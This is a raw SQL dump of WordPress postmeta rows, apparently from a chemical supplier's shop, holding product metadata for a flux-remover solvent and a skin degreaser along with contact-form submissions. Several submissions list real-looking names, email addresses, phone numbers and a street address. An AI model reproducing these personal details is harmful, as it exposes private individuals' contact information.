INSERT INTO `wp_postmeta` VALUES (28351, 3356, '_field_3', 'We are in need of Refined Light Cycle Oil/Bunker diluent / Light Industrial Oil – LCI / Light Recycle Oil – LCR roughly about 100,000-300,000 MT, with trial shipment of 50,000MT.'); 
INSERT INTO `wp_postmeta` VALUES (28352, 3356, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28353, 3356, '_sub_id', '3356'); 
INSERT INTO `wp_postmeta` VALUES (28354, 3358, '_edit_lock', '1491710566:2'); 
INSERT INTO `wp_postmeta` VALUES (28355, 3358, '_edit_last', '3'); 
INSERT INTO `wp_postmeta` VALUES (28356, 3359, '_wp_attached_file', '2016/12/shutterstock_543794323.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28357, 3359, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/12/shutterstock_543794323.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_543794323-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_543794323-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_543794323-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_543794323-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_543794323-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_543794323-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_543794323-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28358, 3360, '_wp_attached_file', '2016/12/MS-550N-552N.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28359, 3358, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (28360, 3358, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (28361, 3358, '_thumbnail_id', '3359'); 
INSERT INTO `wp_postmeta` VALUES (28362, 3358, '312_default_editor', '<span style="text-decoration: underline;"><strong>Properties of Solvent:</strong></span>\r\nBoiling Point………………………………… 122°F /50°C\r\nFlash Point…………………………………….…….None\r\nLiquid Density…………………..1.35 g/ml @ 77°F/25°C\r\nOzone Depletion……………………………………..0.00<strong> </strong>'); 
INSERT INTO `wp_postmeta` VALUES (28363, 3358, '716_default_editor', '<strong>Ideal for Heavy Duty Applications and Electrical Cleaning: </strong>A nonflammable, cleaning  solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies.'); 
INSERT INTO `wp_postmeta` VALUES (28364, 3358, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28365, 3358, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28366, 3358, '318_custom_list_file', 'a:1:{s:32:"6d2513291e3c9143a459e11ae9e5460a";a:3:{s:4:"name";s:17:"MS-550N / MS-552N";s:4:"file";s:77:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/MS-550N-552N.pdf";s:4:"desc";s:3:"TDS";}}'); 
INSERT INTO `wp_postmeta` VALUES (28367, 3358, '317_default_editor', '<strong>MS-550N: </strong>Aerosol (12 oz.)\r\n\r\n<strong>MS-552N: </strong>Quart, Gallon, 5-Gallon, 55-Gallon drum'); 
INSERT INTO `wp_postmeta` VALUES (28368, 3358, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28369, 3358, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (28370, 3358, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28371, 3358, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28372, 3358, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28373, 3358, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (28374, 3358, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28375, 3358, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28376, 3358, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (28377, 3358, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28378, 3358, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (28379, 3358, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (28380, 3358, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (28381, 3358, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (28382, 3358, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (28383, 3358, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28384, 3358, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28385, 3358, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28386, 3358, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (28387, 3358, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (28388, 3358, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28389, 3358, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (28390, 3358, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28391, 3358, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28392, 3358, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (28393, 3358, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28394, 3358, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28395, 3358, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (28396, 3358, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28397, 3358, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28398, 3358, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (28399, 3358, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (28400, 3358, '_ywtm_content_tab_description', '<span style="text-decoration: underline;"><strong>Description</strong></span>\r\n\r\nMS-550N / MS-552N is a nonflammable, cleaning solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, electrical contacts, relays, and switching devices. Well suited for cleaning oils, flux and particulate matter from complex assemblies. Evaporates quickly and leaves no residue. It replaces HCFC-225 in many applications.\r\n\r\n<strong> </strong><strong>ADVANTAGES:</strong>\r\n<ul>\r\n 	<li>Evaporates quickly</li>\r\n 	<li>Leaves no residue</li>\r\n 	<li>Nonflammable</li>\r\n 	<li>Non-ozone depleting</li>\r\n 	<li>RoHS Compliant</li>\r\n</ul>\r\n<span style="text-decoration: underline;"><strong>Properties of Solvent:</strong></span>\r\nBoiling Point………………………………… 122°F /50°C\r\nFlash Point…………………………………….…….None\r\nLiquid Density…………………..1.35 g/ml @ 77°F/25°C\r\nOzone Depletion……………………………………..0.00<strong> </strong>\r\n\r\n<span style="text-decoration: underline;"><strong>Plastic Compatibility:</strong></span>\r\n\r\n(Immersion: 15 minutes at Room Temperature)\r\n<table style="height: 141px;" width="498">\r\n<tbody>\r\n<tr>\r\n<td width="168">·         Acetal</td>\r\n<td width="168">·         Polyethylene</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polypropylene</td>\r\n<td width="168">·         Polyester, PBT, PET</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PEK, PEEK</td>\r\n<td width="168">·         Epoxy-Phenolcs</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         Polyimides</td>\r\n<td width="168">·         Polyvinylchloride</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·         PTFE</td>\r\n<td width="168">·         Liq. Crystal Polymer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>NOTE:</strong><strong>  </strong>Acrylic, ABS, and polycarbonate, if under stress, may show slight cracking or crazing damage. Test for compatibility before use.\r\n\r\n<span style="text-decoration: underline;"><strong>Elastomer Capability: </strong></span>\r\n\r\n(Immersion: 15 mins at Room Temperature)\r\n<table style="height: 117px;" width="545">\r\n<tbody>\r\n<tr>\r\n<td width="168">·   Butyl Rubber</td>\r\n<td width="168">·    Natural Rubber</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Polysulfide</td>\r\n<td width="168">·    EPDM</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Buna S</td>\r\n<td width="168">·    Buna N</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Neoprene</td>\r\n<td width="168">·    Urethane</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Chlorosulfonated PE</td>\r\n<td width="168">·    Silicone</td>\r\n</tr>\r\n<tr>\r\n<td width="168">·   Viton™</td>\r\n<td width="168"></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>NOTE:</strong> Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of the elastomers. Test for compatibility before use.'); 
INSERT INTO `wp_postmeta` VALUES (28401, 3358, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (28402, 3358, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28403, 3358, '_yoast_wpseo_primary_product_cat', '343'); 
INSERT INTO `wp_postmeta` VALUES (28404, 3358, '_yoast_wpseo_focuskw_text_input', 'Cleaning Solvent and Flux Remover'); 
INSERT INTO `wp_postmeta` VALUES (28405, 3358, '_yoast_wpseo_focuskw', 'Cleaning Solvent and Flux Remover'); 
INSERT INTO `wp_postmeta` VALUES (28406, 3358, '_yoast_wpseo_title', 'Cleaning Solvent and Flux Remover | MS-550N | Miller-Stephenson'); 
INSERT INTO `wp_postmeta` VALUES (28407, 3358, '_yoast_wpseo_metadesc', 'High Performance nonflammable, cleaning solvent and flux remover for critical cleaning of electronic components, circuits, precision instruments, relays,etc'); 
INSERT INTO `wp_postmeta` VALUES (28408, 3358, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28409, 3358, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-550N","score":"ok"}]'); 
INSERT INTO `wp_postmeta` VALUES (28410, 3358, '_yoast_wpseo_linkdex', '74'); 
INSERT INTO `wp_postmeta` VALUES (28411, 3358, '_wp_old_slug', 'cleaning-solvent-flux-remover'); 
INSERT INTO `wp_postmeta` VALUES (28412, 3362, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (28413, 3362, '_seq_num', '190'); 
INSERT INTO `wp_postmeta` VALUES (28414, 3362, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28415, 3362, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (28416, 3362, '_field_1', 'Steve Johnson'); 
INSERT INTO `wp_postmeta` VALUES (28417, 3362, '_field_10', 'S J Turbine Inc'); 
INSERT INTO `wp_postmeta` VALUES (28418, 3362, '_field_2', 'steve@sjturbine.com'); 
INSERT INTO `wp_postmeta` VALUES (28419, 3362, '_field_8', '(954) 812-2566'); 
INSERT INTO `wp_postmeta` VALUES (28420, 3362, '_field_3', 'Would like the pricing and details on the Dupont Krytox HC Plus Cleaner. Steve Johnson'); 
INSERT INTO `wp_postmeta` VALUES (28421, 3362, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (28422, 3362, '_sub_id', '3362'); 
INSERT INTO `wp_postmeta` VALUES (28423, 3363, '_edit_lock', '1482949129:2'); 
INSERT INTO `wp_postmeta` VALUES (28424, 3363, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (28425, 3364, '_wp_attached_file', '2016/12/H1112B.pdf'); 
INSERT INTO `wp_postmeta` VALUES (28426, 3365, '_wp_attached_file', '2016/12/shutterstock_280855511.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28427, 3365, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:667;s:4:"file";s:34:"2016/12/shutterstock_280855511.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280855511-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_280855511-800x534.jpg";s:5:"width";i:800;s:6:"height";i:534;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_280855511-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280855511-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_280855511-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_280855511-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_280855511-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28428, 3366, '_wp_attached_file', '2016/12/Skin-Degreaser-H-1112B.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28429, 3366, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2448;s:6:"height";i:3264;s:4:"file";s:34:"2016/12/Skin-Degreaser-H-1112B.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-600x800.jpg";s:5:"width";i:600;s:6:"height";i:800;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:35:"Skin-Degreaser-H-1112B-768x1024.jpg";s:5:"width";i:768;s:6:"height";i:1024;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"Skin-Degreaser-H-1112B-1200x1600.jpg";s:5:"width";i:1200;s:6:"height";i:1600;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"Skin-Degreaser-H-1112B-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28430, 3363, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (28431, 3363, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (28432, 3363, '_thumbnail_id', '3365'); 
INSERT INTO `wp_postmeta` VALUES (28433, 3363, '312_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28434, 3363, '716_default_editor', '<ul>\r\n 	<li>Surgical Drapes</li>\r\n 	<li>Tape</li>\r\n 	<li>EKG Electrodes</li>\r\n 	<li>Plastic Surgery</li>\r\n 	<li>Colostomy Bags</li>\r\n 	<li>IV Sites</li>\r\n 	<li>Grounding Pads</li>\r\n 	<li>Dressings</li>\r\n 	<li>Ostomy Appliances</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (28435, 3363, '1367_default_editor', '<ul>\r\n 	<li>H-1112B</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (28436, 3363, '719_default_editor', '<ul>\r\n 	<li>F.D.A. Approved</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (28437, 3363, '318_custom_list_file', 'a:1:{s:32:"6b1cd2dfa754016cfbe77491b18fe703";a:3:{s:4:"name";s:23:"Safety Data Sheet (SDS)";s:4:"file";s:71:"https://www.miller-stephenson.com/wp-content/uploads/2016/12/H1112B.pdf";s:4:"desc";s:39:"Skin Degreaser H1112B Safety Data Sheet";}}'); 
INSERT INTO `wp_postmeta` VALUES (28438, 3363, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28439, 3363, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (28440, 3363, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (28441, 3363, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28442, 3363, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28443, 3363, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (28444, 3363, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (28445, 3363, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28446, 3363, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28447, 3363, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (28448, 3363, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28449, 3363, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (28450, 3363, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (28451, 3363, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (28452, 3363, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (28453, 3363, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (28454, 3363, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28455, 3363, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28456, 3363, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28457, 3363, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (28458, 3363, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (28459, 3363, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (28460, 3363, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (28461, 3363, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28462, 3363, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28463, 3363, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (28464, 3363, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28465, 3363, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (28466, 3363, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (28467, 3363, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28468, 3363, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (28469, 3363, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (28470, 3363, '_ywtm_title_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (28471, 3363, '_ywtm_content_tab_description', ''); 
INSERT INTO `wp_postmeta` VALUES (28472, 3363, '_product_image_gallery', '3366'); 
INSERT INTO `wp_postmeta` VALUES (28473, 3363, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (28474, 3363, '_yoast_wpseo_primary_product_cat', '12'); 
INSERT INTO `wp_postmeta` VALUES (28475, 3363, '_yoast_wpseo_focuskw_text_input', 'Skin Degreaser'); 
INSERT INTO `wp_postmeta` VALUES (28476, 3363, '_yoast_wpseo_focuskw', 'Skin Degreaser'); 
INSERT INTO `wp_postmeta` VALUES (28477, 3363, '_yoast_wpseo_title', 'H-1112B Skin Degreaser | FDA Approved | Pre-Surgical Skin Cleaner'); 
INSERT INTO `wp_postmeta` VALUES (28478, 3363, '_yoast_wpseo_metadesc', 'Miller-Stephenson Skin Degreaser is an innovation in pre-surgical cleaners. It also degreases catheter, biopsy and colostomy sites.'); 
INSERT INTO `wp_postmeta` VALUES (28479, 3363, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (28480, 3363, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (28481, 3368, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28482, 3368, '_seq_num', '183'); 
INSERT INTO `wp_postmeta` VALUES (28483, 3368, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28484, 3368, '_field_12', 'William Warner'); 
INSERT INTO `wp_postmeta` VALUES (28485, 3368, '_field_13', 'Allison Systems Corp.'); 
INSERT INTO `wp_postmeta` VALUES (28486, 3368, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28487, 3368, '_field_14', 'bwarner@allisonblades.com'); 
INSERT INTO `wp_postmeta` VALUES (28488, 3368, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (28489, 3368, '_field_16', 'I am looking for an alternative method of bonding G-10 composite materials and have previously purchased some epon epoxy from your company.  We have a need to bond thin strips of G-10 composite materials together to form longer strips.  The strips are typically 1.5” wide and 0.020” thick and up to 10 feet long.  When combined together, the strips are 1.5” wide x 0.020” thick and up to 14 feet long.  We machine a scarf joint on the 1.5” width to increase bond area and use the West System epoxy as a bonding adhesive.  The West System generally performs well although we have had some issues with the bond failing.  The major issue we have with the West System epoxy is the 24 hour cure time.  When the finished product is used by our customer, it can be exposed to organic solvents and amines, glycol ethers, Toluene, Ethyl Acetate, or propylene glycol derivatives.  Any bonding agent used would need to have resistance to these compounds.\r\n\r\nI am ideally looking for an adhesive with a shorter cure time and improved bond strength would be a secondary desire.   We would desire a working time of around 15 minutes to a maximum of 30 minutes and a cure time to working strength of an hour or two if possible.  Can you recommend a product that will achieve those goals?  If so, is it possible to get a small sample for testing and evaluation?  Our overall volume of epoxy used is low and we are currently manually mixing the West System epoxy.\r\n\r\nAny and all thoughts or suggestions would be appreciated.\r\n'); 
INSERT INTO `wp_postmeta` VALUES (28490, 3368, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28491, 3368, '_sub_id', '3368'); 
INSERT INTO `wp_postmeta` VALUES (28492, 3369, '_wp_attached_file', '2016/12/MS-550N.jpg'); 
INSERT INTO `wp_postmeta` VALUES (28493, 3369, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:2592;s:6:"height";i:1728;s:4:"file";s:19:"2016/12/MS-550N.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:19:"MS-550N-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:19:"MS-550N-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:19:"MS-550N-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:21:"MS-550N-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:19:"MS-550N-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:19:"MS-550N-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:19:"MS-550N-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:19:"MS-550N-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:12:"Daniel Fahmi";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:8:"OpenCASA";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:2:"30";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (28494, 3370, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28495, 3370, '_seq_num', '184'); 
INSERT INTO `wp_postmeta` VALUES (28496, 3370, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28497, 3370, '_field_12', 'T. Scott Evans'); 
INSERT INTO `wp_postmeta` VALUES (28498, 3370, '_field_13', 'Universal Urethane Inc'); 
INSERT INTO `wp_postmeta` VALUES (28499, 3370, '_field_18', 'Pending'); 
INSERT INTO `wp_postmeta` VALUES (28500, 3370, '_field_14', 'scott.e@uuilv.com'); 
INSERT INTO `wp_postmeta` VALUES (28501, 3370, '_field_15', '(702) 308-8091'); 
INSERT INTO `wp_postmeta` VALUES (28502, 3370, '_field_16', 'Universal Urethane Inc \n4201 East Lone Mountain\nNorth Las Vegas NV 89081\nT. Scott Evans\n702-308-8091 ex 223\nProduct Sample 8800. Product will be tested for compatibility with two of our urethane systems. Test one  will be with our seat foam product and the second with our integral skin polyurethane product. '); 
INSERT INTO `wp_postmeta` VALUES (28503, 3370, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (28504, 3370, '_sub_id', '3370'); 
INSERT INTO `wp_postmeta` VALUES (28505, 3371, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (28506, 3371, '_seq_num', '185'); 
INSERT INTO `wp_postmeta` VALUES (28507, 3371, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (28508, 3371, '_field_12', 'asdtest'); 
INSERT INTO `wp_postmeta` VALUES (28509, 3371, '_field_13', 'asd'); 
INSERT INTO `wp_postmeta` VALUES (28510, 3371, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (28511, 3371, '_field_14', 'zchowdhury@mschem.com'); 
INSERT INTO `wp_postmeta` VALUES (28512, 3371, '_field_15', '(203) 743-4447'); 
